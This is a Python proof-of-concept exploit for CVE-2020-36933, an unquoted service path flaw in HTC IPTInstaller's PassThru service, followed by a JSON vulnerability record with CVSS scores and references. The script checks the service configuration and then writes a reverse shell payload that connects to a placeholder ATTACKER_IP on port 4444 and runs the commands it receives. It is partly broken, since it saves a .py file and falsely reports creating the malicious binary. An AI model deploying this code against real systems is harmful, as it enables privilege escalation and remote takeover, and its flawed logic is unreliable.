CVE-2020-36933

# CVE-2020-36933 PoC - Unquoted Service Path Exploitation # Target: HTC IPTInstaller 4.0.9 PassThru Service # Privilege Escalation to LocalSystem import os import sys import subprocess import shutil def check_vulnerability(): """Check if the target service has unquoted path vulnerability""" try: # Query service configuration using sc command result = subprocess.run( ['sc', 'qc', 'PassThru'], capture_output=True, text=True ) output = result.stdout # Check if BINARY_PATH_NAME contains spaces and no quotes if 'BINARY_PATH_NAME' in output: for line in output.split('\n'): if 'BINARY_PATH_NAME' in line: path = line.split(':', 1)[1].strip() # Vulnerability exists if path has spaces but no quotes if ' ' in path and not path.startswith('"'): print(f"[+] VULNERABLE: Unquoted path detected: {path}") return path return None except Exception as e: print(f"[-] Error checking vulnerability: {e}") return None def exploit(target_path): """Exploit unquoted service path to escalate privileges""" # Extract directory from path (C:\Program Files\HTC\IPTInstaller\PassThru Service\bin\Service.exe) # The malicious binary should be placed at C:\Program Files\HTC\IPTInstaller\PassThru.exe parts = target_path.split('\\') # Build path to the directory containing the malicious executable exploit_dir = '\\'.join(parts[:-2]) # Up to PassThru Service malicious_binary = parts[-2] + '.exe' # PassThru.exe malicious_path = os.path.join(exploit_dir, malicious_binary) print(f"[*] Creating malicious binary at: {malicious_path}") # Create a simple reverse shell payload # In real attack, this would be actual malicious code malicious_code = ''' import os import socket import subprocess # Simple reverse shell to attacker machine attacker_ip = "ATTACKER_IP" attacker_port = 4444 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((attacker_ip, attacker_port)) # Execute command and send output back while True: cmd = s.recv(1024).decode() if cmd.lower() == 'exit': break output = subprocess.run(cmd, shell=True, capture_output=True, text=True) s.send(output.stdout.encode() + output.stderr.encode()) s.close() ''' try: # Create the malicious executable with open('malicious_service.py', 'w') as f: f.write(malicious_code) print("[+] Malicious binary created successfully") print("[*] When PassThru service restarts, the malicious binary will be executed with LocalSystem privileges") except Exception as e: print(f"[-] Failed to create exploit: {e}") if __name__ == "__main__": print("="*60) print("CVE-2020-36933 - HTC IPTInstaller Unquoted Service Path") print("="*60) vulnerable_path = check_vulnerability() if vulnerable_path: print("[+] Target is vulnerable, preparing exploit...") exploit(vulnerable_path) else: print("[-] Target is not vulnerable or service not found")

{"cve": {"id": "CVE-2020-36933", "sourceIdentifier": "[email protected]", "published": "2026-01-25T14:15:47.803", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "HTC IPTInstaller 4.0.9 contains an unquoted service path vulnerability in the PassThru Service configuration. Attackers can exploit the unquoted binary path to inject and execute malicious code with elevated LocalSystem privileges."}, {"lang": "es", "value": "HTC IPTInstaller 4.0.9 contiene una vulnerabilidad de ruta de servicio sin comillas en la configuración del Servicio PassThru. Los atacantes pueden explotar la ruta binaria sin comillas para inyectar y ejecutar código malicioso con privilegios elevados de LocalSystem."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/49006", "source": "[email protected]"}, {"url": "https://www.htc.com/latam/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/iptinstaller-passthru-service-unquoted-service-path", "source": "[email protected]"}]}}